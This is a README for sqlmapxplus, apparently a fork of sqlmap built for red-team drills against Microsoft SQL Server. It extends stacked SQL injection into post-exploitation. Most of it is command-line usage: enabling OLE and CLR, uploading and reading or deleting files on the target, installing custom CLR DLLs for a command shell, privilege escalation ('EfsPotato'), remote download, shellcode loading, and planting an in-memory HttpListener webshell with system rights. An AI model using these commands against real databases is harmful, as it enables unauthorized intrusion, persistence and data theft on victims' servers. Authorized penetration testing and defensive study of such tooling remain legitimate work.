SqlmapXPlus
v1.50-sqlmapxplus
In many regional attack and defense drills, SQL Server database stack injection still has a high frequency of hole blasting. However, due to some common drill scenario restrictions, such as no network access, low permissions, site and database separation, terminal protection, difficulty in going online, Permission maintenance is cumbersome, and only one --os-shell can no longer meet our needs.
sqlmapxplus is based on sqlmap, re-opening the classic database vulnerability exploitation tool, referring to various solutions, and adding MSSQL database injection utilization methods. At present, part of the second development has been completed, including file upload of ole and Automated shellcode loading function.
20240508 update instructions : Newly added function of opening ole, new function of reading specified files, new function of moving specified files, new function of copying specified files, new function of deleting specified files, new function of determining the location of specified files, new function of storage Process query function, new delete stored process function, modify ole upload method, modify clr installation process, modify clr command execution method, remove errors caused by Chinese comments
Aiming at the problem of clr installation failure caused by dll transmission loss during the actual network process (temporary solution) It is found that the clr dll used in the original --install-clr function is too large, and a large number of injections are often required in actual combat. If the injection process A certain error will cause the dll to fail to be implemented and the dll cannot be successfully entered. The original one-click automatic installation process is now removed and modified to allow the user to customize the dll installation based on the actual target situation and temporarily add --check- The file option determines whether the dll file is successfully landed on the target host. Temporarily add --check-clr to determine whether the user-defined function is successfully loaded in the database.
Why does the problem of dll amplification occur during the upload process? Converting to hexadecimal and then restoring causes the file to increase. For example, the letter A will be converted to 41 in hexadecimal, doubling the size.
Problems with customizing clr (completed) install-clr is modified to require specifying the custom clr.dll path. Enter the user-defined class name in the prompt box and the user-defined method name clr_shell mode. The method of executing the clr function in the clr_shell mode is modified to: User-defined function passes in parameters (completed)
File system access: --xp-upload upload file by xp_cmdshell --ole-upload upload file by ole --check-file use xp_fileexis check file exist --ole-del delete file by ole --ole-read read file content by ole --ole-move move file by ole --ole-copy copy file by ole Operating system access: --enable-clr enable clr --disable-clr disable clr --enable-ole enable ole --check-clr check user-defined functions in the database --del-clr delete user-defined functions in the database --install-clr install clr --clr-shell clr shell --sharpshell-upload1 sharpshell upload1 --sharpshell-upload2 sharpshell upload2
about ole :
# 开启 ole 利用功能 python sqlmap.py -r/-u xxx --enable-ole # 通过 ole 上传文件 python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path # 通过 ole 删除指定文件 python sqlmap.py -r/-u xxx --ole-del remote_file_path # 通过 ole 阅读指定文件 python sqlmap.py -r/-u xxx --ole-read remote_file_path # 通过 ole 移动并重命名文件 python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path # 通过 ole 复制文件 python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2 # 通过 ole 实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload2
other functions:
# 通过 xp_cmdshell 上传文件 python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path # 使用 xp_fileexis 来检查文件是否存在 python sqlmap.py -r/-u xxx --check-file remote_file_path # 查询数据库中是否存在用户自定义函数 python sqlmap.py -r/-u xxx --check-clr clr_function_name # 删除用户自定义函数 python sqlmap.py -r/-u xxx --del-clr clr_function_name # 通过 xp_cmdshell实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload1
about clr :
# 开启 clr 利用功能 python sqlmap.py -r/-u xxx --enable-clr # 关闭 clr 利用功能 python sqlmap.py -r/-u xxx --disable-clr # 进入 clr 安装模式 python sqlmap.py -r/-u xxx --install-clr # 进入 clr-shell 命令交互模式 python sqlmap.py -r/-u xxx --clr-shell # clr dll 参考如下,更多其他dll请参考星球获取 # 存储过程类名Xplus,存储过程函数名需要注意大小写,分别为 # ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader # 对应项目目录下单独功能的dll,分别为 clrexec.dll clrefspotato.dll clrdownload.dll clrshellcodeloader.dl
Public account: Cyber War
Knowledge Planet: Penetration Testing Guide
Reference link for the old version: https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw
Reference link for the new version: https://mp.weixin.qq.com/s/6RpxXitEPt8rA1DFb56Oxw
https://github.com/sqlmapproject/sqlmap
https://github.com/uknowsec/SharpSQLTools
https://github.com/Anion3r/MSSQLProxy
https://mp.weixin.qq.com/s/X0cI85DdB17Wve2qzCRDbg
https://yzddmr6.com/posts/asp-net-memory-shell-httplistener/
